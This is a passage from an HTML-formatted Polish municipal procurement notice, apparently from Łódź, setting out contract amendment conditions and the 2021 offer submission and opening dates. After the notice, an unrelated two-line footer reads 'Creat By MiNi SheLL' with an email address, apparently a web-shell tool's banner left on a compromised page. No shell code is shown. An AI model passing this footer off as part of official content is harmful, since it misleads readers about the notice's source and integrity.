udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> [Numeracja zgodna z umową]:<br/>§ 14<br/>1. Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy w<br/>stosunku do treści oferty Wykonawcy w zakresie zmiany terminów, o których mowa w umowie<br/>spowodowanych okolicznościami leżącymi po stronie Zamawiającego lub okolicznościami<br/>niezależnymi od Stron w tym m.in.:<br/>a) konieczności przesunięcia terminu przekazania terenu budowy,<br/>b) okoliczności zaistniałych w trakcie realizacji przedmiotu umowy i uniemożliwiających<br/>terminowe wykonanie przedmiotu umowy, w szczególności:<br/>I. niekorzystne warunki atmosferyczne, w szczególności ciągłe opady deszczu lub śniegu<br/>trwające dłużej niż 5 dni, uniemożliwiające realizację robót zgodnie z przyjętą technologią;<br/>II. przedłużający się termin uzyskania wszelkich pozwoleń, uzgodnień, postanowień i decyzji<br/>wydawanych przez organy administracyjne, konieczność uzyskania nowych decyzji lub<br/>uzgodnień lub wstrzymywania robót budowlanych z przyczyn niezależnych od Wykonawcy, a<br/>wynikających z przepisów prawa obowiązującego np. w związku z koniecznością realizacji<br/>przepisów o ochronie przyrody.<br/>Pisemny wniosek o dokonanie zmiany umowy Strona występująca z wnioskiem zobowiązana<br/>jest złożyć w terminie 7 dni od powzięcia wiadomości o takiej okoliczności, potwierdzonej<br/>wpisem w Dziennik Budowy (obowiązek wpisu do Dziennika Budowy nie dotyczy terminu<br/>przekazania terenu budowy). Przedłużenie terminu, o którym mowa w umowie nastąpi o okres<br/>proporcjonalny do czasu jaki wynika z okoliczności uzasadniających przedłużenie terminu. W<br/>przypadku, gdy Strona występująca nie dochowa ww. 7-dniowego terminu, nie będzie<br/>uprawniona do wystąpienia z wnioskiem o zmianę terminów umownych.<br/>2. Okoliczności opisane w pkt a i b stanowiące podstawę zawarcia aneksu nie mogą stanowić<br/>podstawy jakichkolwiek roszczeń majątkowych ze strony Wykonawcy, który niniejszym<br/>oświadcza, że przyjmuje ryzyko pojawienia się opisanych zdarzeń przystępując do<br/>postępowania o udzielenie zamówienia publicznego objętego niniejszą umową.<br/>3. W przypadku zmiany przepisów prawa zmianie ulegną te postanowienia umowy, do których<br/>będzie miała zastosowanie powyższa zmiana.<br/>4. Wszelkie istotne zmiany treści umowy wymagają formy pisemnej - aneksu do umowy, pod<br/>rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">[Numeracja zgodna z SWZ]: 20.1. Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP (Elektronicznej Skrzynki Podawczej – nazwa – Urząd Miasta Łodzi) i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-20 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com